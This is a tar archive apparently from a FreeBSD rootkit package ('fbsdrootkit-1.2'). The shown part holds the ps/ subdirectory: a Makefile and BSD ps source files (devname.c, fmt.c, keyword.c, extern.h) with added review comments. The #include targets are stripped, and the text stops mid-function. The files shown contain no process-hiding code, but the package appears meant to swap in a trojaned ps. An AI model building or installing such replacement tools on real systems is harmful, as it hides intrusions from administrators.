fbsdrootkit-1.2/ 40700 764 764 0 6273477757 11064 5ustar dfdffbsdrootkit-1.2/ps/ 40700 764 764 0 6265032750 11463 5ustar dfdffbsdrootkit-1.2/ps/Makefile100600 764 764 410 6265032677 13205 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.5.4.2 1996/06/05 02:36:06 jkh Exp $ PROG= ps SRCS= fmt.c keyword.c nlist.c print.c ps.c CFLAGS+=-I/sys -static DPADD= ${LIBMATH} ${LIBKVM} LDADD= -lm -lkvm BINGRP= kmem BINMODE=2555 .include fbsdrootkit-1.2/ps/devname.c100600 764 764 5527 5640731120 13347 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: devname.c,v 1.2 1994/09/24 02:56:41 davidg Exp $ */

#if defined(LIBC_SCCS) && !defined(lint)
static char sccsid[] = "@(#)devname.c 8.1 (Berkeley) 5/31/93";
#endif /* LIBC_SCCS and not lint */

/* NOTE(review): the header name after each #include is missing in this copy. */
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * devname --
 *	Look up the name recorded for a device in the database at
 *	_PATH_DEVDB.
 *
 *	dev:	device number; stored in the dev member of the lookup key.
 *	type:	file type; stored in the type member of the lookup key.
 *
 *	Returns the data pointer produced by the database get method, or the
 *	literal "??" when the database could not be opened or the get method
 *	returns non-zero.
 *
 *	The database handle is kept in a function-static variable and opened
 *	on the first call.  A failed open is remembered in `failure', so every
 *	later call returns "??" without retrying.
 *
 *	NOTE(review): the returned pointer is data.data as filled in by
 *	db->get; presumably that storage belongs to the db library and is only
 *	valid until the next lookup -- confirm before keeping the pointer.
 *	Nothing here checks that the stored value is NUL-terminated, although
 *	it is returned as a char *.
 */
char *
devname(dev, type)
	dev_t dev;
	mode_t type;
{
	struct {
		mode_t type;
		dev_t dev;
	} bkey;
	static DB *db;
	static int failure;
	DBT data, key;

	/* Open the database once; warn and latch the failure if that fails. */
	if (!db && !failure &&
	    !(db = dbopen(_PATH_DEVDB, O_RDONLY, 0, DB_HASH, NULL))) {
		warn("warning: %s", _PATH_DEVDB);
		failure = 1;
	}
	if (failure)
		return ("??");

	/*
	 * Keys are a mode_t followed by a dev_t.  The former is the type of
	 * the file (mode & S_IFMT), the latter is the st_rdev field.  Be
	 * sure to clear any padding that may be found in bkey.
	 */
	memset(&bkey, 0, sizeof(bkey));
	bkey.dev = dev;
	bkey.type = type;
	key.data = &bkey;
	key.size = sizeof(bkey);
	/* A non-zero result from get is reported to the caller as "??". */
	return ((db->get)(db, &key, &data, 0) ? "??" : (char *)data.data);
}
fbsdrootkit-1.2/ps/extern.h100600 764 764 6650 5640731120 13240 0ustar dfdf/*- * Copyright (c) 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. 
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#)extern.h 8.3 (Berkeley) 4/2/94 * $Id: extern.h,v 1.2 1994/09/24 02:56:42 davidg Exp $ */ struct kinfo; struct nlist; struct var; struct varent; extern fixpt_t ccpu; extern int eval, fscale, mempages, nlistread, rawcpu; extern int sumrusage, termwidth, totwidth; extern VAR var[]; extern VARENT *vhead; __BEGIN_DECLS void command __P((KINFO *, VARENT *)); void cputime __P((KINFO *, VARENT *)); int donlist __P((void)); void evar __P((KINFO *, VARENT *)); char *fmt_argv __P((char **, char *, int)); double getpcpu __P((KINFO *)); double getpmem __P((KINFO *)); void logname __P((KINFO *, VARENT *)); void longtname __P((KINFO *, VARENT *)); void lstarted __P((KINFO *, VARENT *)); void maxrss __P((KINFO *, VARENT *)); void nlisterr __P((struct nlist *)); void p_rssize __P((KINFO *, VARENT *)); void pagein __P((KINFO *, VARENT *)); void parsefmt __P((char *)); void pcpu __P((KINFO *, VARENT *)); void pmem __P((KINFO *, VARENT *)); void pri __P((KINFO *, VARENT *)); void printheader __P((void)); void pvar __P((KINFO *, VARENT *)); void rssize __P((KINFO *, VARENT *)); void runame __P((KINFO *, VARENT *)); void rvar __P((KINFO *, VARENT *)); void showkey __P((void)); void started __P((KINFO *, VARENT *)); void state __P((KINFO *, VARENT *)); void tdev __P((KINFO *, VARENT *)); void tname __P((KINFO *, VARENT *)); #ifndef NEWVM void trss __P((KINFO *, VARENT *)); #endif void tsize __P((KINFO *, VARENT *)); void ucomm __P((KINFO *, VARENT *)); void uname __P((KINFO *, VARENT *)); void uvar __P((KINFO *, VARENT *)); void vsize __P((KINFO *, VARENT *)); void wchan __P((KINFO *, VARENT *)); __END_DECLS fbsdrootkit-1.2/ps/fmt.c100600 764 764 6503 6155237104 12516 0ustar dfdf/*- * Copyright (c) 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: fmt.c,v 1.5.4.2 1996/06/05 02:36:08 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)fmt.c 8.4 (Berkeley) 4/15/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include "ps.h" static char *cmdpart __P((char *)); static char *shquote __P((char **)); /* * XXX * This is a stub until marc does the real one. 
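*/
/*
 * shquote --
 *	Join the strings of a NULL-terminated argv into one space-separated
 *	string, passing each argument through strvis() with
 *	VIS_NL | VIS_CSTYLE.  Empty arguments are skipped.
 *
 *	Returns a pointer to a function-static buffer that is overwritten by
 *	the next call.
 *
 *	strvis() may emit up to four output bytes per input byte, so the
 *	buffer is sized for a fully expanded ARG_MAX worth of arguments and
 *	every argument is checked against the space that is left before it
 *	is encoded.  Arguments that do not fit are dropped (the result is
 *	truncated) instead of being written past the end of the buffer.
 */
static char *
shquote(argv)
	char **argv;
{
	char **p, *dst, *src;
	static char buf[4 * ARG_MAX + 1];
	size_t room;

	if (*argv == 0) {
		buf[0] = 0;
		return (buf);
	}
	dst = buf;
	for (p = argv; (src = *p++) != 0; ) {
		if (*src == 0)
			continue;
		/*
		 * Worst case for this argument is 4 * strlen(src) bytes plus
		 * the NUL written by strvis(); the separator stored below
		 * reuses the NUL's slot.
		 */
		room = sizeof(buf) - (size_t)(dst - buf);
		if (room == 0 || strlen(src) > (room - 1) / 4)
			break;
		strvis(dst, src, VIS_NL | VIS_CSTYLE);
		while (*dst)
			dst++;
		*dst++ = ' ';
	}
	/* Chop off trailing space */
	if (dst != buf)
		dst--;
	*dst = '\0';
	return (buf);
}

/*
 * cmdpart --
 *	Return the part of arg0 after its last '/', or arg0 itself when it
 *	contains no '/'.  The result points into arg0.
 */
static char *
cmdpart(arg0)
	char *arg0;
{
	char *cp;

	return ((cp = strrchr(arg0, '/')) != NULL ? cp + 1 : arg0);
}

/*
 * fmt_argv --
 *	Build the command string shown for a process.
 *
 *	argv:	 NULL-terminated argument vector; may be NULL or empty.
 *	cmd:	 command name; at most maxlen bytes of it are used.
 *	maxlen:	 limit applied to cmd, both when printing it and when
 *		 comparing it with the last path component of argv[0].
 *
 *	With no arguments the result is " (cmd)".  With arguments it is the
 *	quoted argument string, followed by " (cmd)" only when cmd differs
 *	from the last path component of argv[0].
 *
 *	Returns a malloc()ed string, NULL when allocation fails, or the
 *	string literal "" when there are neither arguments nor a cmd.
 *	NOTE(review): because of the "" case a caller cannot free() the
 *	result unconditionally.
 *
 *	All formatting is bounded by the allocated length.  The no-argument
 *	case needs maxlen + 4 bytes (" (", up to maxlen bytes of cmd, ")" and
 *	the NUL); it previously allocated maxlen + 3, one byte short whenever
 *	cmd was at least maxlen bytes long.
 */
char *
fmt_argv(argv, cmd, maxlen)
	char **argv;
	char *cmd;
	int maxlen;
{
	int len;
	char *ap, *cp;

	if (argv == 0 || argv[0] == 0) {
		if (cmd == NULL)
			return ("");
		ap = NULL;
		len = maxlen + 4;
	} else {
		ap = shquote(argv);
		len = strlen(ap) + maxlen + 4;
	}
	if ((cp = malloc(len)) == NULL)
		return (NULL);
	if (ap == NULL)
		(void)snprintf(cp, len, " (%.*s)", maxlen, cmd);
	else if (strncmp(cmdpart(argv[0]), cmd, maxlen) != 0)
		(void)snprintf(cp, len, "%s (%.*s)", ap, maxlen, cmd);
	else
		(void)snprintf(cp, len, "%s", ap);
	return (cp);
}
fbsdrootkit-1.2/ps/keyword.c100600 764 764 31402 6155237104 13430 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. 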
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: keyword.c,v 1.5.6.3 1996/06/05 02:36:10 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)keyword.c 8.5 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include "ps.h" #ifdef P_PPWAIT #define NEWVM #endif #ifdef NEWVM #include #include #endif static VAR *findvar __P((char *)); static int vcmp __P((const void *, const void *)); #ifdef NOTINUSE int utime(), stime(), ixrss(), idrss(), isrss(); {{"utime"}, "UTIME", USER, utime, 4}, {{"stime"}, "STIME", USER, stime, 4}, {{"ixrss"}, "IXRSS", USER, ixrss, 4}, {{"idrss"}, "IDRSS", USER, idrss, 4}, {{"isrss"}, "ISRSS", USER, isrss, 4}, #endif /* Compute offset in common structures. 
*/ #define POFF(x) offsetof(struct proc, x) #define EOFF(x) offsetof(struct eproc, x) #define UOFF(x) offsetof(struct usave, x) #define ROFF(x) offsetof(struct rusage, x) #define UIDFMT "u" #define UIDLEN 5 #define PIDFMT "d" #define PIDLEN 5 #define USERLEN 8 VAR var[] = { #ifdef NEWVM {"%cpu", "%CPU", NULL, 0, pcpu, 4}, {"%mem", "%MEM", NULL, 0, pmem, 4}, {"acflag", "ACFLG", NULL, 0, pvar, 3, POFF(p_acflag), USHORT, "x"}, {"acflg", "", "acflag"}, {"blocked", "", "sigmask"}, {"caught", "", "sigcatch"}, {"command", "COMMAND", NULL, COMM|LJUST|USER, command, 16}, {"cpu", "CPU", NULL, 0, pvar, 3, POFF(p_estcpu), ULONG, "d"}, {"cputime", "", "time"}, {"f", "F", NULL, 0, pvar, 7, POFF(p_flag), LONG, "x"}, {"flags", "", "f"}, {"ignored", "", "sigignore"}, {"inblk", "INBLK", NULL, USER, rvar, 4, ROFF(ru_inblock), LONG, "d"}, {"inblock", "", "inblk"}, {"jobc", "JOBC", NULL, 0, evar, 4, EOFF(e_jobc), SHORT, "d"}, {"ktrace", "KTRACE", NULL, 0, pvar, 8, POFF(p_traceflag), LONG, "x"}, {"ktracep", "KTRACEP", NULL, 0, pvar, 8, POFF(p_tracep), LONG, "x"}, {"lim", "LIM", NULL, 0, maxrss, 5}, {"login", "LOGIN", NULL, LJUST, logname, MAXLOGNAME}, {"logname", "", "login"}, {"lstart", "STARTED", NULL, LJUST|USER, lstarted, 28}, {"majflt", "MAJFLT", NULL, USER, rvar, 4, ROFF(ru_majflt), LONG, "d"}, {"minflt", "MINFLT", NULL, USER, rvar, 4, ROFF(ru_minflt), LONG, "d"}, {"msgrcv", "MSGRCV", NULL, USER, rvar, 4, ROFF(ru_msgrcv), LONG, "d"}, {"msgsnd", "MSGSND", NULL, USER, rvar, 4, ROFF(ru_msgsnd), LONG, "d"}, {"ni", "", "nice"}, {"nice", "NI", NULL, 0, pvar, 2, POFF(p_nice), CHAR, "d"}, {"nivcsw", "NIVCSW", NULL, USER, rvar, 5, ROFF(ru_nivcsw), LONG, "d"}, {"nsignals", "", "nsigs"}, {"nsigs", "NSIGS", NULL, USER, rvar, 4, ROFF(ru_nsignals), LONG, "d"}, {"nswap", "NSWAP", NULL, USER, rvar, 4, ROFF(ru_nswap), LONG, "d"}, {"nvcsw", "NVCSW", NULL, USER, rvar, 5, ROFF(ru_nvcsw), LONG, "d"}, {"nwchan", "WCHAN", NULL, 0, pvar, 6, POFF(p_wchan), KPTR, "x"}, {"oublk", "OUBLK", NULL, USER, rvar, 
4, ROFF(ru_oublock), LONG, "d"}, {"oublock", "", "oublk"}, {"p_ru", "P_RU", NULL, 0, pvar, 6, POFF(p_ru), KPTR, "x"}, {"paddr", "PADDR", NULL, 0, evar, 6, EOFF(e_paddr), KPTR, "x"}, {"pagein", "PAGEIN", NULL, USER, pagein, 6}, {"pcpu", "", "%cpu"}, {"pending", "", "sig"}, {"pgid", "PGID", NULL, 0, evar, PIDLEN, EOFF(e_pgid), ULONG, PIDFMT}, {"pid", "PID", NULL, 0, pvar, PIDLEN, POFF(p_pid), LONG, PIDFMT}, {"pmem", "", "%mem"}, {"ppid", "PPID", NULL, 0, evar, PIDLEN, EOFF(e_ppid), LONG, PIDFMT}, {"pri", "PRI", NULL, 0, pri, 3}, {"re", "RE", NULL, 0, pvar, 3, POFF(p_swtime), ULONG, "d"}, {"rgid", "RGID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_rgid), ULONG, UIDFMT}, {"rlink", "RLINK", NULL, 0, pvar, 8, POFF(p_back), KPTR, "x"}, {"rss", "RSS", NULL, 0, p_rssize, 4}, {"rssize", "", "rsz"}, {"rsz", "RSZ", NULL, 0, rssize, 4}, {"rtprio", "RTPRIO", NULL, 0, pvar, 7, POFF(p_rtprio), LONG, "d"}, {"ruid", "RUID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_ruid), ULONG, UIDFMT}, {"ruser", "RUSER", NULL, LJUST, runame, USERLEN}, {"sess", "SESS", NULL, 0, evar, 6, EOFF(e_sess), KPTR, "x"}, {"sig", "PENDING", NULL, 0, pvar, 8, POFF(p_siglist), LONG, "x"}, {"sigcatch", "CAUGHT", NULL, 0, pvar, 8, POFF(p_sigcatch), LONG, "x"}, {"sigignore", "IGNORED", NULL, 0, pvar, 8, POFF(p_sigignore), LONG, "x"}, {"sigmask", "BLOCKED", NULL, 0, pvar, 8, POFF(p_sigmask), LONG, "x"}, {"sl", "SL", NULL, 0, pvar, 3, POFF(p_slptime), ULONG, "d"}, {"start", "STARTED", NULL, LJUST|USER, started, 8}, {"stat", "", "state"}, {"state", "STAT", NULL, 0, state, 4}, {"svgid", "SVGID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_svgid), ULONG, UIDFMT}, {"svuid", "SVUID", NULL, 0, evar, UIDLEN, EOFF(e_pcred.p_svuid), ULONG, UIDFMT}, {"tdev", "TDEV", NULL, 0, tdev, 4}, {"time", "TIME", NULL, USER, cputime, 9}, {"tpgid", "TPGID", NULL, 0, evar, 4, EOFF(e_tpgid), ULONG, PIDFMT}, {"tsess", "TSESS", NULL, 0, evar, 6, EOFF(e_tsess), KPTR, "x"}, {"tsiz", "TSIZ", NULL, 0, tsize, 4}, {"tt", "TT ", NULL, 0, tname, 4}, {"tty", "TTY", 
NULL, LJUST, longtname, 8}, {"ucomm", "UCOMM", NULL, LJUST, ucomm, MAXCOMLEN}, {"uid", "UID", NULL, 0, evar, UIDLEN, EOFF(e_ucred.cr_uid), ULONG, UIDFMT}, {"upr", "UPR", NULL, 0, pvar, 3, POFF(p_usrpri), CHAR, "d"}, {"user", "USER", NULL, LJUST, uname, USERLEN}, {"usrpri", "", "upr"}, {"vsize", "", "vsz"}, {"vsz", "VSZ", NULL, 0, vsize, 5}, {"wchan", "WCHAN", NULL, LJUST, wchan, 6}, {"xstat", "XSTAT", NULL, 0, pvar, 4, POFF(p_xstat), USHORT, "x"}, #else {"%cpu", "%CPU", NULL, 0, pcpu, 4}, {"%mem", "%MEM", NULL, 0, pmem, 4}, {"acflag", "ACFLG", NULL, USER, uvar, 3, UOFF(u_acflag), SHORT, "x"}, {"acflg", "", "acflag"}, {"blocked", "", "sigmask"}, {"caught", "", "sigcatch"}, {"command", "COMMAND", NULL, COMM|LJUST|USER, command, 16}, {"cpu", "CPU", NULL, 0, pvar, 3, POFF(p_cpu), ULONG, "d"}, {"cputime", "", "time"}, {"f", "F", NULL, 0, pvar, 7, POFF(p_flag), LONG, "x"}, {"flags", "", "f"}, {"ignored", "", "sigignore"}, {"inblk", "INBLK", NULL, USER, rvar, 4, ROFF(ru_inblock), LONG, "d"}, {"inblock", "", "inblk"}, {"jobc", "JOBC", NULL, 0, evar, 4, EOFF(e_jobc), SHORT, "d"}, {"ktrace", "KTRACE", NULL, 0, pvar, 8, POFF(p_traceflag), LONG, "x"}, {"ktracep", "KTRACEP", NULL, 0, pvar, 8, POFF(p_tracep), LONG, "x"}, {"lim", "LIM", NULL, 0, maxrss, 5}, {"logname", "LOGNAME", NULL, LJUST, logname, MAXLOGNAME}, {"lstart", "STARTED", NULL, LJUST|USER, lstarted, 28}, {"majflt", "MAJFLT", NULL, USER, rvar, 4, ROFF(ru_majflt), LONG, "d"}, {"minflt", "MINFLT", NULL, USER, rvar, 4, ROFF(ru_minflt), LONG, "d"}, {"msgrcv", "MSGRCV", NULL, USER, rvar, 4, ROFF(ru_msgrcv), LONG, "d"}, {"msgsnd", "MSGSND", NULL, USER, rvar, 4, ROFF(ru_msgsnd), LONG, "d"}, {"ni", "", "nice"}, {"nice", "NI", NULL, 0, pvar, 2, POFF(p_nice), CHAR, "d"}, {"nivcsw", "NIVCSW", NULL, USER, rvar, 5, ROFF(ru_nivcsw), LONG, "d"}, {"nsignals", "", "nsigs"}, {"nsigs", "NSIGS", NULL, USER, rvar, 4, ROFF(ru_nsignals), LONG, "d"}, {"nswap", "NSWAP", NULL, USER, rvar, 4, ROFF(ru_nswap), LONG, "d"}, {"nvcsw", "NVCSW", 
NULL, USER, rvar, 5, ROFF(ru_nvcsw), LONG, "d"}, {"nwchan", "WCHAN", NULL, 0, pvar, 6, POFF(p_wchan), KPTR, "x"}, {"oublk", "OUBLK", NULL, USER, rvar, 4, ROFF(ru_oublock), LONG, "d"}, {"oublock", "", "oublk"}, {"p_ru", "P_RU", NULL, 0, pvar, 6, POFF(p_ru), KPTR, "x"}, {"paddr", "PADDR", NULL, 0, evar, 6, EOFF(e_paddr), KPTR, "x"}, {"pagein", "PAGEIN", NULL, USER, pagein, 6}, {"pcpu", "", "%cpu"}, {"pending", "", "sig"}, {"pgid", "PGID", NULL, 0, evar, PIDLEN, EOFF(e_pgid), ULONG, PIDFMT}, {"pid", "PID", NULL, 0, pvar, PIDLEN, POFF(p_pid), LONG, PIDFMT}, {"pmem", "", "%mem"}, {"poip", "POIP", NULL, 0, pvar, 4, POFF(p_poip), SHORT, "d"}, {"ppid", "PPID", NULL, 0, pvar, PIDLEN, POFF(p_ppid), LONG, PIDFMT}, {"pri", "PRI", NULL, 0, pri, 3}, {"re", "RE", NULL, 0, pvar, 3, POFF(p_swtime), ULONG, "d"}, {"rgid", "RGID", NULL, 0, pvar, UIDLEN, POFF(p_rgid), USHORT, UIDFMT}, {"rlink", "RLINK", NULL, 0, pvar, 8, POFF(p_rlink), KPTR, "x"}, {"rss", "RSS", NULL, 0, p_rssize, 4}, {"rssize", "", "rsz"}, {"rsz", "RSZ", NULL, 0, rssize, 4}, {"ruid", "RUID", NULL, 0, pvar, UIDLEN, POFF(p_ruid), USHORT, UIDFMT}, {"rtprio", "RTPRIO", NULL, 0, pvar, 7, POFF(p_rtprio), LONG, "d"}, {"ruser", "RUSER", NULL, LJUST, runame, USERLEN}, {"sess", "SESS", NULL, 0, evar, 6, EOFF(e_sess), KPTR, "x"}, {"sig", "PENDING", NULL, 0, pvar, 8, POFF(p_sig), LONG, "x"}, {"sigcatch", "CAUGHT", NULL, 0, pvar, 8, POFF(p_sigcatch), LONG, "x"}, {"sigignore", "IGNORED", NULL, 0, pvar, 8, POFF(p_sigignore), LONG, "x"}, {"sigmask", "BLOCKED", NULL, 0, pvar, 8, POFF(p_sigmask), LONG, "x"}, {"sl", "SL", NULL, 0, pvar, 3, POFF(p_slptime), ULONG, "d"}, {"start", "STARTED", NULL, LJUST|USER, started, 8}, {"stat", "", "state"}, {"state", "STAT", NULL, 0, state, 4}, {"svgid", "SVGID", NULL, 0, pvar, UIDLEN, POFF(p_svgid), USHORT, UIDFMT}, {"svuid", "SVUID", NULL, 0, pvar, UIDLEN, POFF(p_svuid), USHORT, UIDFMT}, {"tdev", "TDEV", NULL, 0, tdev, 4}, {"time", "TIME", NULL, USER, cputime, 9}, {"tpgid", "TPGID", NULL, 0, evar, 
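4, EOFF(e_tpgid), ULONG, PIDFMT},
	{"trs", "TRS", NULL, 0, trss, 3},
	{"tsess", "TSESS", NULL, 0, evar, 6, EOFF(e_tsess), KPTR, "x"},
	{"tsiz", "TSIZ", NULL, 0, tsize, 4},
	{"tt", "TT", NULL, LJUST, tname, 4},
	{"tty", "TTY", NULL, LJUST, longtname, 8},
	{"ucomm", "UCOMM", NULL, LJUST, ucomm, MAXCOMLEN},
	{"uid", "UID", NULL, 0, pvar, UIDLEN, POFF(p_uid),USHORT, UIDFMT},
	{"upr", "UPR", NULL, 0, pvar, 3, POFF(p_usrpri), CHAR, "d"},
	{"uprocp", "UPROCP", NULL, USER, uvar, 6, UOFF(u_procp), KPTR, "x"},
	{"user", "USER", NULL, LJUST, uname, USERLEN},
	{"usrpri", "", "upr"},
	{"vsize", "", "vsz"},
	{"vsz", "VSZ", NULL, 0, vsize, 5},
	{"wchan", "WCHAN", NULL, LJUST, wchan, 6},
	{"xstat", "XSTAT", NULL, 0, pvar, 4, POFF(p_xstat), USHORT, "x"},
#endif
	{""},
};

/*
 * showkey --
 *	Print the name of every entry in var[], separated by spaces.  When
 *	termwidth is non-zero a newline is used as the separator once the
 *	running line length would exceed it.
 */
void
showkey()
{
	VAR *v;
	int i;
	char *p, *sep;

	i = 0;
	sep = "";
	/* The table ends with an entry whose name is the empty string. */
	for (v = var; *(p = v->name); ++v) {
		int len = strlen(p);

		if (termwidth && (i += len + 1) > termwidth) {
			i = len;
			sep = "\n";
		}
		(void) printf("%s%s", sep, p);
		sep = " ";
	}
	(void) printf("\n");
}

/*
 * parsefmt --
 *	Split the keyword list p on the characters in FMTSEP, look each
 *	keyword up with findvar() and append a varent for every match to the
 *	list headed by vhead.  The string p is modified in place by strsep().
 *
 *	Exits through err() when allocation fails and through errx() when the
 *	list is still empty after parsing.
 *
 *	The keyword list comes from the user, so a list that ends in
 *	separators must not crash the program: strsep() returns NULL once the
 *	input is exhausted, and that NULL used to be handed to findvar().
 */
void
parsefmt(p)
	char *p;
{
	static struct varent *vtail;

#define	FMTSEP	" \t,\n"
	while (p && *p) {
		char *cp;
		VAR *v;
		struct varent *vent;

		/* Skip empty tokens produced by adjacent separators. */
		while ((cp = strsep(&p, FMTSEP)) != NULL && *cp == '\0')
			/* void */;
		/* Only separators were left: nothing more to parse. */
		if (cp == NULL)
			break;
		if (!(v = findvar(cp)))
			continue;
		if ((vent = malloc(sizeof(struct varent))) == NULL)
			err(1, NULL);
		vent->var = v;
		vent->next = NULL;
		if (vhead == NULL)
			vhead = vtail = vent;
		else {
			vtail->next = vent;
			vtail = vent;
		}
	}
	if (!vhead)
		errx(1, "no valid keywords");
}

/*
 * findvar --
 *	Look up keyword p in var[] with bsearch().  A "keyword=header" form
 *	is split at the '=' (p is modified) and the header text replaces the
 *	header of the entry that is found.
 *
 *	An alias entry is expanded by calling parsefmt() on the alias, and
 *	NULL is returned because the expansion has already been appended; a
 *	header override on an alias is reported as an error.
 *
 *	Returns the matching entry, or NULL for an alias or an unknown
 *	keyword.  An unknown keyword sets eval to 1.
 *
 *	The header override is applied only when the lookup succeeded; it
 *	used to be stored through a NULL pointer for "unknown=header".
 */
static VAR *
findvar(p)
	char *p;
{
	VAR *v, key;
	char *hp;
	int vcmp();

	hp = strchr(p, '=');
	if (hp)
		*hp++ = '\0';

	key.name = p;
	/* The final table entry is the "" terminator, not a keyword. */
	v = bsearch(&key, var, sizeof(var)/sizeof(VAR) - 1, sizeof(VAR), vcmp);

	if (v && v->alias) {
		if (hp) {
			warnx("%s: illegal keyword specification", p);
			eval = 1;
		}
		parsefmt(v->alias);
		return ((VAR *)NULL);
	}
	if (!v) {
		warnx("%s: keyword not found", p);
		eval = 1;
		return ((VAR *)NULL);
	}
	if (hp)
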